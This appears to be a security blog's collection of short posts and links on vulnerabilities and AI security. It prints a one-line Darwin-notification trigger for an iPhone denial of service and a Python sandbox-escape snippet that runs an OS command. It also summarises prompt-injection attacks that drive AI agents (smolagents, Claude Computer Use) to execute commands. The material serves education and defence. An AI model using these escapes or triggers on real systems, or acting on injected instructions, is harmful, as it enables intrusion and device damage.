Open source bug bounty ready AI?
All opinions and posts are my own.
My employers (past or present) are not responsible for, and may not agree with, any of them.
Posts do not imply endorsement or agreement; I may just be sharing a discussion or topic of interest.
CVE-2025-24091 - sending Darwin notifications to DoS iPhone
PoC: Widget extension VeryEvilNotify
Blog Post:
https://rambo.codes/posts/2025-04-24-how-a-single-line-of-code-could-brick-your-iphone
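For context, Darwin notifications go through the public notify API, which needs no special entitlement; that is what makes the bug so easy to hit. Below is a minimal sketch, in Python via ctypes so it can be inspected on macOS, of the kind of one-line trigger the post describes. The notification name is the restore trigger reported in the write-up; treat it as illustrative.

```python
# A minimal sketch of posting a Darwin notification from Python via ctypes.
# notify_post() is public Darwin API and needs no entitlement, which is
# exactly why a widget extension could abuse it. The notification name below
# is the restore trigger reported in the write-up; do NOT post it on an iOS
# device you care about.
import ctypes

libsystem = ctypes.CDLL("/usr/lib/libSystem.dylib")
libsystem.notify_post.argtypes = [ctypes.c_char_p]
libsystem.notify_post.restype = ctypes.c_uint32

status = libsystem.notify_post(b"com.apple.MobileSync.BackupAgent.RestoreStarted")
print("notify_post returned", status)  # 0 == NOTIFY_STATUS_OK
```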
The writer exposed a critical vulnerability in Hugging Face's smolagents, a lightweight AI agent framework. By leveraging prompt injection to bypass "safe" module restrictions, attackers can execute arbitrary OS commands, highlighting mounting security risks for autonomous AI systems. - o3-mini summary
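For defenders, it helps to see why import allow-lists alone don't contain Python. The snippet below is a generic, well-known sandbox-escape pattern (attribute-walking from a harmless literal back to __import__), shown to illustrate the class of bypass rather than the exact smolagents payload:

```python
# Illustrative sketch of the *class* of bypass involved: even when `import os`
# is blocked, Python's object graph can often be walked from a harmless
# literal back to __import__. Generic pattern shown for defensive
# understanding; not the specific smolagents exploit.

def smuggle_import():
    # () -> tuple -> object -> every class loaded in the interpreter
    for cls in ().__class__.__base__.__subclasses__():
        init = getattr(cls, "__init__", None)
        globs = getattr(init, "__globals__", None)  # only pure-Python classes
        if globs and "__builtins__" in globs:
            builtins = globs["__builtins__"]
            if isinstance(builtins, dict):
                return builtins["__import__"]
            return builtins.__import__
    return None

_import = smuggle_import()
if _import is not None:
    _import("os").system("id")  # arbitrary OS command, no import statement
```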
This write-up reveals how attackers exploited Go's module proxy caching to maintain persistent malicious code distribution, even after repository updates. This sophisticated attack remained undetected for years, highlighting a serious supply chain vulnerability.
Takeaways:
• Proxy caching features can be weaponized
• Traditional security measures may miss these attacks
• Urgent need for enhanced package verification (one practical check is sketched below)
💡 Action Items for Dev Teams:
https://socket.dev/blog/malicious-package-exploits-go-module-proxy-caching-for-persistence
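One practical check, assuming you resolve through proxy.golang.org: list what the proxy has cached for a module (the /@v/list endpoint is part of the documented Go module proxy protocol) and compare it against the upstream repository's tags. The module path below is hypothetical.

```python
# Minimal sketch of a cache audit: fetch the versions proxy.golang.org has
# cached for a module via the documented /@v/list endpoint. A version that
# exists in the cache but has no matching upstream tag is the persistence
# pattern the post describes.
import urllib.request

MODULE = "github.com/example/somelib"  # hypothetical module path

def escape(path: str) -> str:
    # The proxy protocol case-encodes uppercase letters as '!<lowercase>'.
    return "".join(f"!{c.lower()}" if c.isupper() else c for c in path)

url = f"https://proxy.golang.org/{escape(MODULE)}/@v/list"
with urllib.request.urlopen(url) as resp:
    cached_versions = resp.read().decode().split()

print("versions cached by the proxy:", cached_versions)
# Cross-check against `git ls-remote --tags <repo>`; scrutinize any version
# that exists only in the cache.
```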
Microsoft's AI red team has tested over 100 generative AI products and uncovered three essential lessons. First, red teaming is the starting point for identifying both security vulnerabilities and potential harms as part of responsible AI risk management; this includes spotting bias, data leakage, or other unintended consequences early in product development. Second, human expertise is indispensable for addressing complex AI threats: while automated tools can detect issues, they can't fully capture the nuanced misuse scenarios and policy gaps that experts can identify. Third, a defense-in-depth strategy is crucial for safeguarding AI systems: continuous testing, multiple security layers, and adaptive defenses collectively help mitigate risks, as no single measure can eliminate vulnerabilities in ever-evolving models. By combining proactive stress testing, expert analysis, and layered protections, organizations can better navigate the opportunities and challenges presented by generative AI. - LLM Summary
A Cloud Guru terminates "lifetime" course access, citing the plan being retired.
Neural Fictitious Self-Play (NFSP) for Imperfect-Information Games
It combines a reinforcement learning "improviser" with a supervised learning "planner"; a stripped-down sketch follows below.
Blog post and explanation: https://ai.gopubby.com/neural-fictitious-self-play-nfsp-for-imperfect-information-games-0a8189770240
Research paper (not recent):
https://arxiv.org/abs/1603.01121v2
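To make the two-network split concrete, here is a stripped-down sketch of NFSP's control flow based on the paper. Placeholder callables stand in for the DQN (best response) and the average-policy network, and the training updates are omitted.

```python
# Stripped-down sketch of NFSP's control flow, following Heinrich & Silver
# (arXiv:1603.01121). Placeholder callables stand in for the two networks:
# a Q-network learning a best response and a policy network learning the
# average strategy. Training updates are omitted.
import random

ETA = 0.1        # anticipatory parameter: how often to play the best response
EPSILON = 0.06   # exploration rate for the epsilon-greedy best response

class NFSPAgent:
    def __init__(self, num_actions, q_net, avg_policy_net):
        self.num_actions = num_actions
        self.q_net = q_net                    # state -> list of Q-values
        self.avg_policy_net = avg_policy_net  # state -> action probabilities
        self.rl_memory = []  # transitions (circular buffer in the paper)
        self.sl_memory = []  # (state, action) pairs (reservoir in the paper)

    def act(self, state):
        if random.random() < ETA:
            # Play an epsilon-greedy best response from the Q-network...
            if random.random() < EPSILON:
                action = random.randrange(self.num_actions)
            else:
                qs = self.q_net(state)
                action = max(range(self.num_actions), key=lambda a: qs[a])
            # ...and log it so the average policy can learn to imitate it.
            self.sl_memory.append((state, action))
        else:
            # Otherwise play from the average policy.
            probs = self.avg_policy_net(state)
            action = random.choices(range(self.num_actions), weights=probs)[0]
        return action

    def observe(self, state, action, reward, next_state, done):
        # DQN-style updates on rl_memory and cross-entropy fitting of
        # avg_policy_net on sl_memory would happen here.
        self.rl_memory.append((state, action, reward, next_state, done))
```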
Series on "Beyond XSS" including topics such as Cross-site leaks and CSTI
https://aszx87410.github.io/beyond-xss/en/
Very appropriately, it was built with Docusaurus, a static site generator :blobgrin:
The Future of Application Security: Integrating LLMs and AI Agents into Manual Workflows
https://www.anshumanbhartiya.com/posts/the-future-of-appsec
LLM Summary:
LLMs are no longer just about generating content - they're becoming powerful security allies by combining planning, memory, and sophisticated tool usage capabilities. These agents can understand complex queries and respond naturally to security challenges.
LLM integration is revolutionizing software engineering by:
• Enhancing defect prediction
• Automating security documentation
• Reducing human errors in code review
• Streamlining secure coding practices (a small sketch follows below)
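As a small illustration of the code-review angle, here is a hedged sketch that wires a diff into an LLM gate, assuming an OpenAI-compatible client; the model name is a placeholder, and this supplements rather than replaces human review.

```python
# A hedged sketch of LLM-assisted code review, assuming an OpenAI-compatible
# client (the model name is a placeholder). Intended as one automated gate
# alongside, not instead of, human review.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

def review_diff(diff_text: str) -> str:
    response = client.chat.completions.create(
        model="gpt-4o-mini",  # placeholder model name
        messages=[
            {"role": "system",
             "content": ("You are a security-focused code reviewer. Flag "
                         "injection risks, authorization gaps, and unsafe "
                         "deserialization; cite lines and suggest fixes.")},
            {"role": "user", "content": "Review this diff:\n\n" + diff_text},
        ],
    )
    return response.choices[0].message.content

# Example: feed it the output of `git diff main...feature` in CI.
```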
"Quantum decryption may materialise only two or three decades later, said Prof Ling, but enterprises will defend themselves better if they keep up to date and know their data repositories and vulnerabilities."
InfoSec Black Friday Deals 2024
https://github.com/0x90n/InfoSec-Black-Friday/blob/master/README.md
Shazzer is a fuzzing tool designed to uncover browser quirks and security vulnerabilities by focusing on differences in browser behavior. Whether you're testing for HTML parsing issues, JavaScript execution, or XSS vulnerabilities, Shazzer can help.
A recent PortSwigger video shows it in use: https://youtu.be/mLzxwmNoAI4?si=NnDWXZOqc-Yjnue1
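To make the approach concrete, here is a minimal sketch of Shazzer-style character fuzzing (illustrative only, not Shazzer's implementation): generate a page that tries every byte as the separator between a tag name and an attribute, then let the browser report which variants still parse.

```python
# Illustrative sketch of Shazzer-style character fuzzing (not Shazzer's own
# implementation): emit an HTML page placing each character code between a
# tag name and an attribute, then let the browser report which variants
# still parsed into a working link.
vectors = "\n".join(
    f'<a{chr(code)}href="https://example.com" id="v{code}">x</a>'
    for code in range(0x100)
)

script = """
<script>
// A character is a valid separator iff the href survived parsing.
const hits = [];
for (let i = 0; i < 256; i++) {
  const el = document.getElementById('v' + i);
  if (el && el.tagName === 'A' && el.href) hits.push(i);
}
document.title = 'valid separators: ' + hits.join(',');
</script>
"""

with open("fuzz.html", "w", encoding="utf-8") as f:
    f.write("<!doctype html><meta charset='utf-8'><body>\n" + vectors + script)
# Open fuzz.html in each browser and diff the reported separator sets.
```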
Video - Hacking Azure: From OSINT to Full Compromise!
Scenario:
A seemingly innocuous post by a new manager at Mega Big Tech, showcasing their new workstation, inadvertently leaked sensitive Azure credentials. This oversight allowed attackers to gain unauthorized access and escalate privileges through a compromised Azure Logic App automation, leading to a potential data breach.
Learning points:
The SaaS attack techniques blog post covers some notable attack vectors, such as:
Read more here:
Using Burp Suite to test Android apps running on Android 14
https://danaepp.com/hacking-modern-android-apps-with-burpsuite
"The LLM and Generative AI Security Solutions Landscape ... provides a reference guide of the solutions available to aid in securing LLM applications, equipping them with the knowledge and tools necessary to build robust, secure AI applications."
Three things to read about:
https://genai.owasp.org/resource/llm-and-generative-ai-security-solutions-landscape/
GitHub Spark - an AI tool that builds web apps from natural-language prompts.
ZombAIs: From Prompt Injection to C2 with Claude Computer Use
https://embracethered.com/blog/posts/2024/claude-computer-use-c2-the-zombais-are-coming/